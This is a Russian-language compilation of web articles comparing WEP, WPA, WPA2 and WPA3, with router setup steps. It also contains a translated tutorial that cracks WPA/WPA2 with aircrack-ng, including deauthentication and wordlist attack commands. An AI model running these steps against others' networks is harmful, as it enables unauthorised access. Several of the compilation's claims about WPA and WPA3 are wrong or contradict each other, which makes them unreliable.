Параметры совместимости WPA и TKIP также могут замедлить работу вашей сети Wi-Fi. Многие современные маршрутизаторы Wi-Fi, поддерживающие 802.11n и новее, более быстрые стандарты замедлится до 54 Мбит / с, если вы включите WPA или TKIP в их параметрах. Они делают это, чтобы гарантировать совместимость со старыми устройствами.

Для сравнения, даже 802.11n поддерживает скорость до 300 Мбит / с, если вы используете WPA2 с AES. Теоретически 802.11ac обеспечивает максимальную скорость 3,46 Гбит / с при оптимальных (читай: идеальных) условиях.


На большинстве маршрутизаторов, которые мы видели, обычно используются следующие варианты: WEP, WPA (TKIP) и WPA2 (AES) — возможно, с добавлением режима совместимости WPA (TKIP) + WPA2 (AES) для хорошей меры.

Если у вас есть странный тип маршрутизатора, который предлагает WPA2 в вариантах TKIP или AES, выберите AES. Почти все ваши устройства наверняка будут с ним работать, и это быстрее и безопаснее. Это простой выбор, если вы помните, что AES — хороший вариант.

Кредит изображения: Miyo 73 на Fickr

Технологии WEP и WPA

Защита беспроводной сети – важнейший аспект безопасности. Подключение к интернету с использованием небезопасных ссылок или сетей угрожает безопасности системы и может привести к потере информации, утечке учетных данных и установке в вашей сети вредоносных программ. Очень важно применять надлежащие меры защиты Wi-Fi, однако также важно понимать различия стандартов беспроводного шифрования: WEP, WPA, WPA2 и WPA3.

WPA (Wi-Fi Protected Access) – это стандарт безопасности для вычислительных устройств с беспроводным подключением к интернету. Он был разработан объединением Wi-Fi Alliance для обеспечения лучшего шифрования данных и аутентификации пользователей, чем было возможно в рамках стандарта WEP (Wired Equivalent Privacy), являющегося исходным стандартом безопасности Wi-Fi. С конца 1990-х годов стандарты безопасности Wi-Fi претерпели некоторые изменения, направленные на их улучшение.

Что такое WEP?

Беспроводные сети передают данные посредством радиоволн, поэтому, если не приняты меры безопасности, данные могут быть с легкостью перехвачены. Представленная в 1997 году технология WEP является первой попыткой защиты беспроводных сетей. Ее целью было повышение безопасности беспроводных сетей за счет шифрования данных. Даже в случае перехвата данных, передаваемых в беспроводной сети, их невозможно было прочитать, поскольку они были зашифрованы. Однако системы, авторизованные в сети, могут распознавать и расшифровывать данные, благодаря тому, что все устройства в сети используют один и тот же алгоритм шифрования.

WEP шифрует трафик с использованием 64 или 128-битного ключа в шестнадцатеричном формате. Это статический ключ, поэтому весь трафик, независимо от устройства, шифруется с помощью одного ключа. Ключ WEP позволяет компьютерам внутри сети обмениваться зашифрованными сообщениями, однако содержимое сообщений скрыто от злоумышленников. Этот ключ используется для подключения к беспроводной сети с включенной безопасностью.

Одна из основных задач технологии WEP – предотвращение атак типа «человек посередине», с которой она успешно справлялась в течение определенного времени. Однако, несмотря на изменения протокола и увеличение размера ключа, со временем в стандарте WEP были обнаружены различные недостатки. По мере роста вычислительных мощностей злоумышленникам стало проще использовать эти недостатки. Объединение Wi-Fi Alliance официально отказалось от использования технологии WEP в 2004 году из-за ее уязвимостей. В настоящее время технология безопасности WEP считается устаревшей, хотя иногда она все еще используется либо из-за того, что администраторы сети не изменили настроенные умолчанию протоколы безопасности беспроводных роутеров, либо из-за того, что устройства устарели и не способны поддерживать новые методы шифрования, такие как WPA.

Что такое WPA?

WPA (Wi-Fi Protected Access) – это появившийся в 2003 году протокол, которым объединение Wi-Fi Alliance заменило протокол WEP. WPA похож на WEP, однако в нем усовершенствована обработка ключей безопасности и авторизации пользователей. WEP предоставляет всем авторизованным системам один ключ, а WPA использует протокол целостности временного ключа (Temporal Key Integrity Protocol, TKIP), динамически изменяющий ключ, используемый системами. Это не позволяет злоумышленникам создать собственный ключ шифрования, соответствующий используемому в защищенной сети. Стандарт шифрования TKIP впоследствии был заменен расширенным стандартом шифрования (Advanced Encryption Standard, AES).

Кроме того, протокол WPA включает проверку целостности сообщений, чтобы определить, имел ли место захват или изменение пакетов данных злоумышленником. Протокол WPA использует 256-битные ключи, что значительно надежнее 64 и 128-битных ключей, используемых протоколом WEP. Однако, несмотря на эти улучшения, в протоколе WPA также были обнаружены уязвимости, что привело к созданию протокола WPA2.

Иногда используется термин «ключ WPA» – это пароль для подключения к беспроводной сети. Пароль WPA можно получить от администратора сети. В ряде случаев установленный по умолчанию пароль WPA может быть напечатан на беспроводном роутере. Если не удается определить пароль роутера, возможно, его можно сбросить.

Что такое WPA2?

Протокол WPA2 появился в 2004 году. Он является обновленной версией WPA. WPA2 основан на механизме сети высокой безопасности (RSN) и работает в двух режимах:

  • Персональный режим или общий ключ (WPA2-PSK) – использует общий пароль доступа и обычно применяется в домашних сетях.
  • Корпоративный режим (WPA2-EAP) – больше подходит для сетей организаций и коммерческого использования.

В обоих режимах используется протокол CCMP, основанный на алгоритме расширенного стандарта шифрования (AES), обеспечивающего проверку подлинности и целостности сообщения. Протокол CCMP является более надежным, чем исходно используемый в WPA протокол TKIP, поэтому его использование затрудняет атаки злоумышленников.

Однако у протокола WPA2 также есть недостатки. Например, он уязвим для атак с переустановкой ключа (KRACK). Атаки с переустановкой ключа используют уязвимость WPA2, позволяющую имитировать реальную сеть и вынуждать пользователей подключаться к вредоносной сети вместо настоящей. Это позволяет злоумышленникам расшифровывать небольшие фрагменты данных, объединение которых позволит взломать ключ шифрования. Однако на устройства могут быть установлены исправления, поэтому WPA2 считается более надежным, чем WEP и WPA.

Что такое WPA3?

WPA3 – это третья версия протокола защищенного доступа Wi-Fi. Объединение Wi-Fi Alliance выпустило WPA3 в 2018 году. В протоколе WPA3 реализованы следующие новые функции для личного и для корпоративного использования:

Индивидуальное шифрование данных. При входе в публичную сеть WPA3 регистрирует новое устройство способом, не подразумевающим использование общего пароля. В WPA3 используется протокол DPP (Device Provisioning Protocol) для сетей Wi-Fi, позволяющий пользователям использовать теги NFC или QR-коды для подключения устройств к сети. Кроме того, для обеспечения безопасности WPA3 используется шифрование GCMP-256 вместо применявшегося ранее 128-битного шифрования.

Протокол SAE (одновременная аутентификация равных). Этот протокол используется для создания безопасного «рукопожатия», при котором сетевое устройство подключается к беспроводной точке доступа, и оба устройства обмениваются данными для проверки аутентификации и подключения. Даже если пароль пользователя не достаточно надежный, WPA3 обеспечивает более безопасное взаимодействие по протоколу DPP для сетей Wi-Fi .

Усиленная защита от атак методом подбора пароля. Протокол WPA3 защищает от подбора пароля в автономном режиме. Пользователю позволяется выполнить только одну попытку ввода пароля. Кроме того, необходимо взаимодействовать напрямую с устройством Wi-Fi: при каждой попытке ввода пароля требуется физическое присутствие. В протоколе WPA2 отсутствует встроенное шифрование и защита данных в публичных открытых сетях, что делает атаки методом подбора пароля серьезной угрозой.

Устройства, работающие по протоколу WPA3, стали широко доступны в 2019 году. Они поддерживают обратную совместимость с устройствами, работающими по протоколу WPA2.

Какой протокол безопасности применяется в моей сети Wi-Fi?

Для обеспечения надлежащего уровня безопасности сети Wi-Fi важно знать, какой тип шифрования в ней используется. Устаревшие протоколы являются более уязвимыми, чем новые, поэтому вероятность их взлома выше. Устаревшие протоколы были разработаны до того, как стало полностью понятно, каким способом злоумышленники осуществляют атаки на роутеры. В новых протоколах эти уязвимости устранены, поэтому считается, что они обеспечивают лучшую безопасность сетей Wi-Fi.

Как определить тип безопасности вашей сети Wi-Fi

В Windows 10

  • Найдите значок подключения к Wi-Fi на панели задач и нажмите на него.
  • Затем выберите пункт Свойства под текущим подключением Wi-Fi.
  • Прокрутите вниз и найдите сведения о подключении Wi-Fi в разделе Свойства.
  • Под ним найдите пункт Тип безопасности, в котором отображаются данные вашего протокола Wi-Fi.

В macOS

  • Удерживайте нажатой клавишу Option.
  • Нажмите на значок Wi-Fi на панели инструментов.
  • В результате отобразятся сведения о вашей сети Wi-Fi, включая тип безопасности.

В Android

  • На телефоне Android перейдите в раздел Настройки.
  • Откройте категорию Wi-Fi.
  • Выберите роутер, к которому вы подключены, и посмотрите информацию о нем.
  • Отобразится тип безопасности сети Wi-Fi.
  • Путь к этому экрану может отличаться в зависимости от устройства.

В iPhone

К сожалению, в iOS нет возможности проверить безопасность вашей сети Wi-Fi. Чтобы проверить уровень безопасности сети Wi-Fi, можно использовать компьютер или войти на роутер через телефон. Все модели роутеров отличаются, поэтому, возможно, придется обратиться к документации устройства. Если роутер настроен интернет-провайдером, можно обратиться к нему за помощью. 

WEP или WPA. Заключение

Если роутер не защищен, злоумышленники могут получить доступ к вашим частотам подключения к интернету, осуществлять незаконные действия, используя ваше подключение, отслеживать вашу сетевую активность и устанавливать вредоносные программы в вашей сети. Важным аспектом защиты роутера является понимание различий между протоколами безопасности и использование самого продвинутого из поддерживаемых вашим роутером (или обновление роутера, если он не поддерживает стандарты безопасности текущего поколения). В настоящее время WEP считается устаревшим стандартом шифрования Wi-Fi, и по возможности следует использовать более современные протоколы.

Ниже перечислены дополнительные действия, которые можно предпринять для повышения безопасности роутера:

  1. Изменить имя, заданное по умолчанию для домашней сети Wi-Fi.
  2. Изменить имя пользователя и пароль роутера.
  3. Поддерживать прошивку в актуальном состоянии.
  4. Отключить удаленный доступ, универсальную настройку сетевых устройств (Universal Plug and Play) и настройку защищенного Wi-Fi.
  5. Если возможно, использовать гостевую сеть.

Вы можете ознакомиться с полным руководством по настройке безопасной домашней сети. Один из лучших способов для сохранения безопасности в интернете – использование современного антивирусного решения, такого как Kaspersky Total Security, обеспечивающего защиту от злоумышленников, вирусов и вредоносных программ, а также включающего средства сохранения конфиденциальности, предоставляющие всестороннюю защиту.

Статьи по теме:

Как обезопасить/защитить мою беспроводную сеть с помощью WPA-PSK/WPA2-PSK при использовании беспроводного маршрутизатора TP-Link 11N?

Эта статья подходит для: 

TL-WDR3600 , TL-WR841N , TL-WR842N , TL-WDR3500 , TL-WR743ND , TL-WR940N , TL-WDR4900 , TL-WR741ND , TL-WR941ND , TL-WR843N , TL-WR740N , TL-WR710N , TL-WR840N , TL-WDR4300 , TL-WR841ND , TL-WR810N , TL-WR720N , TL-WR843ND , TL-WR702N , TL-WR700N , TL-WR842ND , TL-WR841HP , TL-WR1043ND , TL-WR1042ND

Шаг 1 Откройте веб-браузер, наберите IP -адрес маршрутизатора (192.168.1.1 по умолчанию)   в адресной строке и нажмите Enter .

Шаг 2 Введите имя пользователя и пароль на странице авторизации, по умолчанию имя пользователя и пароль: admin .

Шаг 3 В меню слева выберите Wireless (Беспроводная связь) -> Wireless Settings (Настройки беспроводных сетей), откроется окно настройки беспроводных сетей.

Идентификатор SSID (имя беспроводной сети): задайте новое имя для вашей беспроводной сети


Канал: 1, 6 или 11 подойдут лучше, чем Auto (Авто).

Поставьте галочку в полях «Enable Wireless Router Radio» (» Включить беспроводной маршрутизатор «) и «Enable SSID Broadcast» (» Включить вещание SSID»).

Шаг 4 Нажмите Save (Сохранить) для сохранения настроек.

Примечание: После нажатия кнопки Save (Сохранить), появляется сообщение “Изменения настроек беспроводной сети начнут работать только после перезагрузки компьютера, пожалуйста, нажмите здесь, чтобы перезагрузить компьютер сейчас”. Вам не нужно перезагружать маршрутизатор, пока вы не завершите все настройки беспроводной сети.

Шаг 5 В меню слева выберите Wireless (Беспроводная связь) -> Wireless Security (Безопасность беспроводной сети), с правой стороны включите опцию WPA — PSK / WPA 2- PSK .

Version (Версия): WPA — PSK или WPA 2- PSK

Encryption (Шифрование): TKIP или AES

PSK Password (Предварительно выданный ключ): укажите пароль (длина предварительно выданного ключа от 8 до 63 символов.)

Шаг 6 Нажмите Save (Сохранить) для сохранения настроек.

Шаг 7 В меню слева выберите Systems Tools (Служебные программы) -> Reboot (Перезагрузка). Перезагрузите маршрутизатор для того, чтобы настройки вступили в силу.

Примечание: Если вы настраивали безопасность, то настройки безопасности должны быть такими же у клиента (беспроводной адаптер) для подключения к беспроводной сети (маршрутизатору).

 

 

 

 

 

 

Был ли этот FAQ полезен?

Ваш отзыв поможет нам улучшить работу сайта.

Да Нет

Что вам не понравилось в этой статье?

  • Недоволен продуктом
  • Слишком сложно
  • Неверный заголовок
  • Не относится к моей проблеме
  • Слишком туманное объяснение
  • Другое

Как мы можем это улучшить?

Отправить

Спасибо

Спасибо за обращение
Нажмите здесь, чтобы связаться с технической поддержкой TP-Link.

В чем разница между WPA2, WPA, WEP, AES и TKIP?

Практически везде, куда вы идете сегодня, есть сеть WiFi, к которой вы можете подключиться. Будь то дома, в офисе или в местной кофейне, существует множество сетей WiFi. Каждая сеть Wi-Fi настроена на какую-то сетевую безопасность, либо открытую для всех, либо крайне ограниченную, где могут подключаться только определенные клиенты.

Когда дело доходит до безопасности WiFi, у вас есть только несколько вариантов, особенно если вы настраиваете домашнюю беспроводную сеть. На сегодняшний день тремя крупными протоколами безопасности являются WEP, WPA и WPA2. Два больших алгоритма, которые используются с этими протоколами, — это TKIP и AES с CCMP. Я объясню некоторые из этих понятий более подробно ниже.

Какой вариант безопасности выбрать?

Если вам не нужны все технические детали каждого из этих протоколов и вы просто хотите узнать, какой из них выбрать для своего беспроводного маршрутизатора, ознакомьтесь со списком ниже. Это ранжируется от самого безопасного до наименее безопасного. Чем более безопасный вариант вы можете выбрать, тем лучше.

Если вы не уверены, что некоторые из ваших устройств смогут подключаться наиболее безопасным способом, я предлагаю вам включить его, а затем проверить, есть ли какие-либо проблемы. Я думал, что несколько устройств не будут поддерживать самое высокое шифрование, но был удивлен, обнаружив, что они подключены очень хорошо.

  1. WPA2 Enterprise (802.1x RADIUS)
  2. WPA2-PSK AES
  3. WPA-2-PSK AES + WPA-PSK TKIP
  4. WPA TKIP
  5. WEP
  6. Открыто (Нет безопасности)

Стоит отметить, что WPA2 Enterprise не использует предварительные общие ключи (PSK), но вместо этого использует протокол EAP и требует сервер RADIUS для проверки подлинности с использованием имени пользователя и пароля. PSK, который вы видите с WPA2 и WPA, в основном является ключом беспроводной сети, который вы должны ввести при первом подключении к беспроводной сети.

WPA2 Enterprise гораздо сложнее в настройке и обычно выполняется только в корпоративных средах или в домах с технически подкованными владельцами. Практически вы сможете выбирать только варианты от 2 до 6, хотя большинство маршрутизаторов теперь даже не имеют опции для WEP или WPA TKIP, потому что они небезопасны.

Обзор WEP, WPA и WPA2

Я не буду вдаваться в технические подробности каждого из этих протоколов, потому что вы можете легко найти их в Google, чтобы получить больше информации. По сути, протоколы безопасности беспроводной сети появились в конце 90-х годов и с тех пор развиваются. К счастью, только несколько протоколов были приняты, и поэтому это намного легче понять.

WEP

WEP или Wired Equivalent Privacy была выпущена еще в 1997 году вместе со стандартом 802.11 для беспроводных сетей. Он должен был обеспечить конфиденциальность, эквивалентную проводной сети (отсюда и название).

WEP начинался с 64-битного шифрования и в конечном итоге прошел вплоть до 256-битного шифрования, но наиболее популярной реализацией в маршрутизаторах было 128-битное шифрование. К сожалению, очень скоро после введения WEP исследователи безопасности обнаружили несколько уязвимостей, которые позволили им взломать ключ WEP в течение нескольких минут.

Даже с обновлениями и исправлениями протокол WEP оставался уязвимым и легким для проникновения. В ответ на эти проблемы WiFi Alliance представил WPA или WiFi Protected Access, который был принят в 2003 году.

WPA

На самом деле WPA предназначалось лишь как промежуточное средство до тех пор, пока они не смогли завершить WPA2, который был введен в 2004 году и в настоящее время является стандартом, используемым в настоящее время. WPA использовал TKIP или протокол целостности временного ключа в качестве способа обеспечения целостности сообщения. Это отличалось от WEP, в котором использовались CRC или циклическая проверка избыточности. TKIP был намного сильнее, чем CRC.

К сожалению, чтобы обеспечить совместимость, WiFi Alliance позаимствовал некоторые аспекты у WEP, что в итоге сделало WPA небезопасным и с TKIP. WPA включил новую функцию под названием WPS (WiFi Protected Setup), которая должна была упростить пользователям подключение устройств к беспроводному маршрутизатору. Однако в результате появились уязвимости, которые позволили исследователям безопасности взломать ключ WPA за короткий промежуток времени.

WPA2

WPA2 стал доступен уже в 2004 году и официально потребовался к 2006 году. Самым большим изменением между WPA и WPA2 стало использование алгоритма шифрования AES с CCMP вместо TKIP.

В WPA AES был необязательным, но в WPA2 AES является обязательным, а TKIP — необязательным. С точки зрения безопасности, AES намного безопаснее, чем TKIP. В WPA2 были обнаружены некоторые проблемы, но они относятся только к корпоративной среде и не относятся к домашним пользователям.

WPA использует 64-битный или 128-битный ключ, наиболее распространенным из которых является 64-битный для домашних маршрутизаторов. WPA2-PSK и WPA2-Personal являются взаимозаменяемыми терминами.

Так что если вам нужно что-то вспомнить из всего этого, то вот что: WPA2 — самый безопасный протокол, а AES с CCMP — самое безопасное шифрование. Кроме того, WPS должен быть отключен, поскольку очень легко взломать и перехватить PIN-код маршрутизатора, который затем можно использовать для подключения к маршрутизатору. Если у вас есть какие-либо вопросы, не стесняйтесь комментировать. Наслаждайтесь!

Взлом Wi-Fi-сетей, защищённых WPA и WPA2 / Хабр

Автор статьи, перевод которой мы сегодня публикуем, хочет рассказать о том, как взломать Wi-Fi-сеть, для защиты которой используются протоколы WPA и WPA2.


Статья написана исключительно в ознакомительных целях


Аппаратное и программное обеспечение

Я буду пользоваться дистрибутивом Kali Linux, установленным на VMware Workstation.

Кроме того, в моём распоряжении имеется Wi-Fi-адаптер Alfa AWUS036NH 2000mW 802.11b/g/n. Вот его основные характеристики:

  • Стандарты: IEEE 802.11b/g/n, USB 2.0.
  • Скорости передачи данных: 802.11b — 11 Мбит/с, 802.11g — 54 Мбит/с, 802.11n — 150 Мбит/с.
  • Разъём для подключения антенны: 1 x RP-SMA.
  • Частотные диапазоны: 2412~2462 МГц, 2412~2472 МГц, 2412~2484 МГц.
  • Питание: 5В.
  • Безопасность: WEP 64/128, поддержка 802.1X, WPS, WPA-PSK, WPA2.

Шаг 1

Нужно запустить Kali Linux в VMware и подключить к системе Wi-Fi-адаптер Alfa AWUS036NH, выполнив следующую последовательность действий:

VM > Removable Devices > Ralink 802.11n USB Wireless Lan Card > Connect


Подключение Wi-Fi-адаптера к ОС, работающей в VMware

Шаг 2

Теперь обратите внимание на средства управления Wi-Fi-подключениями в Kali Linux.


Управление Wi-Fi-подключениями в Kali Linux

Шаг 3

Откройте терминал и выполните команду

airmon-ng

для вывода сведений об интерфейсах беспроводных сетей.


Вывод сведений об интерфейсах беспроводных сетей

Шаг 4

Как видно, интерфейсу назначено имя

wlan0

. Зная это, выполним в терминале команду

airmon-ng start wlan0

. Благодаря этой команде Wi-Fi-адаптер будет переведён в режим мониторинга.


Перевод адаптера в режим мониторинга

Шаг 5

Теперь выполните такую команду:

airodump-ng wlan0mon

. Это позволит получить сведения о Wi-Fi-сетях, развёрнутых поблизости, о том, какие методы шифрования в них используются, а так же — о SSID.


Сведения о Wi-Fi-сетях

Шаг 6

Теперь воспользуемся такой командой:

airodump-ng -c [channel] –bssid [bssid] -w /root/Desktop/ [monitor interface]

В ней

[channel]

надо заменить на номер целевого канала,

[bssid]

— на целевой BSSID,

[monitor interface]

— на интерфейс мониторинга

wlan0mon

.

В результате моя команда будет выглядеть так:

airodump-ng -c 6 –bssid 4C:ED:FB:8A:4F:C0 -w /root/Desktop/ wlan0mon


Выполнение команды

Шаг 7

Теперь нужно подождать. Утилита

airodump

будет мониторить сеть, ожидая момента, когда кто-нибудь к ней подключится. Это даст нам возможность получить handshake-файлы, которые будут сохранены в папке

/root/Desktop

.

Вот как выглядит работа утилиты до того момента, как кто-то подключился к исследуемой сети.


Программа наблюдает за сетью

А вот что происходит после того, как то-то к сети подключился, и программе удалось получить нужные данные.


Получение необходимых данных

Шаг 8

Вы можете пропустить этот шаг в том случае, если у вас уже есть handshake-файлы. Здесь описан альтернативный способ получения соответствующих данных.

Речь идёт об использовании следующей команды:

aireplay-ng -0 2 -a [router bssid] -c [client bssid] wlan0mon

Здесь

[router bssid]

нужно заменить на BSSID Wi-Fi-сети, а

[client bssid]

— на идентификатор рабочей станции.

Эта команда позволяет получить handshake-данные в том случае, если вам не хочется ждать момента чьего-либо подключения к сети. Фактически, эта команда атакует маршрутизатор, выполняя внедрение пакетов. Параметр -0 2 можно заменить другим числом, например, указать тут число 50, или большее число, и дождаться получения handshake-данных


Использование утилиты aireplay-bg

Шаг 9

Теперь воспользуемся такой командой:

aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap

  • -a2 означает WPA.
  • -b — это BSSID сети.
  • -w — это путь к списку паролей.
  • *.cap — это шаблон имён файлов, содержащих пароли.

В моём случае эта команда выглядит так:

aircrack-ng -a2 -b 4C:ED:FB:8A:4F:C0 -w /root/Desktop/ww.txt /root/Desktop/*.cap

После выполнения этой команды начнётся процесс взлома пароля. Если пароль будет успешно взломан — вы увидите что-то, похожее на следующий скриншот.


Успешный взлом пароля

Как вы контролируете безопасность своих беспроводных сетей?

какой протокол безопасности WiFi вы должны использовать?

WPA против WPA2: какой протокол безопасности WiFi вы должны использовать?

Беспроводные сети есть везде. Если вы находитесь в кафе, школе или дома, то, скорее всего, есть несколько беспроводных сетей, к которым вы можете получить доступ. Но как узнать, какие из них безопасны? Проверьте их параметры безопасности – они могут быть хорошим индикатором того, каким из этих сетей вы можете доверять. Чтобы помочь вам в этом вопросе, мы обсудим историю протоколов безопасности WPA и WPA2 и сравним их между собой.

Параметры безопасности маршрутизатора (роутера)

Когда вы устанавливаете Wi-Fi, у вас есть несколько вариантов безопасности роутера. Если ваш роутер останется незащищенным, то посторонние лица смогут получить к нему доступ, использовать его для незаконной деятельности от вашего имени, отслеживать использование Интернета или даже устанавливать вредоносные программы.

Когда вы настраиваете безопасность беспроводной сети, вам будет доступно несколько вариантов: например, none, WEP, WPA, WPA2-Personal, WPA2-Enterprise и, возможно, WPA3. В зависимости от того, каким образом вы планируете пользоваться Интернетом, вам может потребоваться более или менее надежная защита.

Какой лучший метод обеспечения безопасности беспроводного Интернета?

Какой способ защиты вы выберете, будет зависеть от возможностей вашего роутера. Старые устройства не могут поддерживать новые протоколы безопасности, такие как WPA3.

Ниже мы приводим список протоколов безопасности, ранжированных по степени безопасности (вверху – наиболее безопасные):

1. WPA3

2. WPA2 Enterprise

3. WPA2 Personal

4. WPA + AES

5. WPA + TKIP

6. WEP

7. Open Network (no security implemented)

История протоколов безопасности

Безопасность беспроводной сети менялась с течением времени, чтобы стать более надежной, но при этом и более простой с точки зрения ее настройки. С момента появления Wi-Fi мы прошли путь от протокола WEP к протоколу WPA3. Давайте вспомним историю развития этих протоколов безопасности.

Wired Equivalent Privacy (WEP)

Первый протокол безопасности был назван Wired Equivalent Privacy или WEP. Этот протокол оставался стандартом безопасности с 1999 по 2004 год. Хотя эта версия протокола была создана для защиты, тем не менее, она имела достаточно посредственный уровень безопасности и была сложна в настройке.

В то время импорт криптографических технологий был ограничен, а это означало, что многие производители могли использовать только 64-битное шифрование. Это очень низкое битовое шифрование по сравнению с 128-битными или 256-битными опциями, доступными сегодня. В конечном счете, протокол WEP не стали развивать дальше.

Системы, которые все еще используют WEP, не являются безопасными. Если у вас есть система с WEP, ее следует обновить или заменить. При подключении к Wi-Fi, если в заведении используется протокол WEP, то ваша Интернет-активность не будет безопасной.

WiFi Protected Access (WPA)

Для улучшения функций WEP в 2003 году был создан протокол Wi-Fi Protected Access или WPA. Этот улучшенный протокол по-прежнему имел относительно низкую безопасность, но его легче было настроить. WPA, в отличие от WEP, использует протокол Temporary Key Integrity Protocol (TKIP) для более безопасного шифрования.

Поскольку Wi-Fi Alliance сделал переход с WEP на более продвинутый протокол WPA, они должны были сохранить некоторые элементы WEP, чтобы старые устройства все еще были совместимы. К сожалению, это означает, что такие уязвимости как функция настройки WiFi Protected, которую можно взломать относительно легко, все еще присутствуют в обновленной версии WPA.


WiFi Protected Access 2 (WPA2)

Годом позже, в 2004 году, стала доступна новая версия протокола Wi-Fi Protected Access 2. WPA2 обладает более высоким уровнем безопасности, а также он проще настраивается по сравнению с предыдущими версиями. Основное отличие в WPA2 заключается в том, что он использует улучшенный стандарт шифрования Advanced Encryption Standard (AES) вместо TKIP. AES способен защищать сверхсекретную правительственную информацию, поэтому это хороший вариант для обеспечения безопасности WiFi дома или в компании.

Единственная заметная уязвимость WPA2 заключается в том, что как только кто-то получает доступ к сети, он может атаковать другие устройства, подключенные к этой сети. Это может стать проблемой в том случае, если у компании есть внутренняя угроза, например, несчастный сотрудник, который способен взломать другие устройства в сети компании (или предоставить для этих целей свое устройства хакерам-профессионалам).

WiFi Protected Access 3 (WPA3)

По мере выявления уязвимостей вносятся соответствующие изменения и улучшения. В 2018 году Wi-Fi Alliance представил новый протокол WPA3 . Как ожидается, эта новая версия будет иметь «новые функции для упрощения безопасности Wi-Fi, обеспечения более надежной аутентификации и повышения криптографической устойчивости для высокочувствительных данных». Новая версия WPA3 все еще внедряется, поэтому оборудование, сертифицированное для поддержки WPA3, пока не является доступным для большинства людей.

WPA против WPA2: чем они отличаются

Протоколы WPA и WPA2 являются наиболее распространенными мерами безопасности, которые используются для защиты беспроводного Интернета. Учитывая это, мы сравнили разницу между WPA и WPA2, чтобы вы могли подобрать правильный вариант для вашей ситуации.

При сравнении WPA и WPA2, протокол WPA2 будет лучшим вариантом, если ваше устройство может его поддерживать.

Почему кто-то выбирает WPA?

Протокол WPA имеет менее безопасный метод шифрования и требует более короткого пароля, что делает его более слабым вариантом с точки зрения безопасности. Для WPA не существует корпоративного решения, поскольку оно не является достаточно безопасным для поддержки использования в компаниях. Однако если у вас есть более старое программное обеспечение, WPA можно использовать с минимальной вычислительной мощностью и это протокол может стать более приемлемым для Вас вариантом, чем старый протокол WEP.

Почему лучше выбирать WPA2?

Протокол WPA2 — это обновленная версия WPA, которая использует шифрование AES и длинные пароли для создания защищенной сети. WPA2 имеет версии для личного и корпоративного использования, что делает его идеальным вариантом как для домашних пользователей, так и для предприятий. Однако для работы этого протокола требуется больше вычислительных мощностей, поэтому, если у вас старое устройство, тот этот протокол может работать на нем медленно или вообще не работать.

Независимо от того, какой вариант лучше всего подходит для вас, важно, чтобы вы обеспечивали безопасность своему устройству, правильно защищая свое Wi-Fi-соединение. Если ваш роутер не поддерживает самый безопасный метод шифрования, рассмотрите возможность использования VPN для шифрования вашего подключения. Бесплатный VPN от компании Panda Security может помочь вам безопасно и конфиденциально путешествовать по Интернету из любой точки мира.

Источники:

мы рассказываем о главных новостях из мира IT, актуальных угрозах и событиях, которые оказывают влияние на

, бизнес глобальных корпораций и безопасность пользователей по всему миру. Узнай первым как

WPA2-PSK недостаточно хорош

В наши дни сотрудники получают доступ к своим корпоративным ресурсам везде, где есть сильный беспроводной сигнал, будь то общественная точка доступа, аэропорт или квартира друга. Методы проверки подлинности на основе предварительного общего ключа (PSK) чаще всего используются в средах такого типа, поскольку они просты в реализации и требуют запоминания только одного пароля.

Однако большинство людей не подозревают, насколько опасными могут быть сети PSK.Мы часто слышим от сетевых менеджеров, что сетевой безопасности WPA2-PSK достаточно, поскольку они могут перемещать свои конфиденциальные данные в облако. Опрос показал, что 74% лиц, принимающих решения в области ИТ (чьи организации уже подвергались взлому в прошлом), говорят, что это было связано со злоупотреблением учетными данными привилегированного доступа.

Многие не понимают, что то, что ваши данные находятся в облаке, не означает, что они недоступны для внешних субъектов. Тот факт, что учетные данные отправляются через облако, не означает, что они не подвержены краже учетных данных по воздуху.Узнайте, как клиент SecureW2 обновил свою сетевую инфраструктуру для безопасной аутентификации в облаке.

Если вы готовы перейти с WPA2-PSK, попробуйте бесплатную демоверсию нашей облачной платформы WPA2-Enterprise 802.1x. Если вам все еще нужны убеждения, читайте дальше.

Руководство по настройке WPA2-PSK

Основной причиной того, что WPA2-PSK так широко используется, является простой и быстрый процесс его настройки. Организации с ограниченным бюджетом и ИТ-ресурсами могут быстро настроить эту сеть, выполнив следующие простые шаги.

  1. Получите доступ к странице конфигурации точки доступа к вашей сети, введя ее IP-адрес
    1. Проверьте точный номер в руководстве по вашей точке доступа, но номера по умолчанию: 192.168.1.1 или 192.168.0.1
  2. Введите имя пользователя и пароль администратора для доступа к настройкам
  3. Выберите настройки беспроводной сети
  4. В разделе «Параметры безопасности» выберите WPA2-PSK в качестве типа шифрования
  5. Введите пароль из символов ASCII, который потребуется для доступа к сети
  6. Нажмите «Применить», чтобы сохранить настройки.

Уязвимости WPA-2PSK

Когда ваш WPA2-PSK скомпрометирован, хакеры могут легко получить доступ к уровню 2 вашей сети (уровень OSI, который используется для передачи данных между соседними узлами).Ниже приведены лишь некоторые из действий, которые может выполнить хакер с доступом уровня 2:

  • Атаки протокола разрешения адресов (ARP)
  • Переполнение таблицы адресуемой памяти содержимого (CAM)
  • Атаки протокола связующего дерева (STP)
  • Подмена управления доступом к среде (MAC)
  • Подмена коммутатора
  • Двойная маркировка
  • Протокол обнаружения Cisco (CDP) разведка
  • Подмена протокола динамической конфигурации хоста (DHCP)

 

PSK невероятно легко украсть, и кто-то может нанести ущерб сети, если получит доступ.Распространение единого пароля для доступа к сети в среде WPA2-Personal требует от каждого пользователя добросовестности в том, что он будет хранить пароль в тайне. Единые учетные данные быстро передаются посторонним, когда выделенная гостевая сеть недоступна. Чем больше учетных данных распространяется и распространяется среди неутвержденных пользователей сети, тем выше вероятность того, что они попадут в гнусные руки.

Даже организации, использующие уникальные учетные данные для каждого пользователя, сталкиваются с аналогичными проблемами, связанными с учетными данными.Хотя это увеличивает сложность получения пароля посторонним лицом, оно становится жертвой многих из тех же проблем и атак.

Поскольку сеть зависит от соблюдения пользователем высоких стандартов безопасности, она сопряжена со многими из тех же рисков, что и WPA2-Personal. Пользователи по-прежнему могут делиться паролями с посторонними, рискуя потерять свои учетные данные из-за их записи или стать жертвами неэффективных политик истечения срока действия паролей.

Атаки по словарю и беспроводные атаки могут быть выполнены, но лишь немного усложняются при использовании нескольких уникальных учетных данных.Если злоумышленник получит PSK и перехватит рукопожатие ключа при подключении устройства к сети, этот человек сможет расшифровать ВЕСЬ трафик этого конкретного устройства.

WPA2-PSK ужасен для конечного пользователя

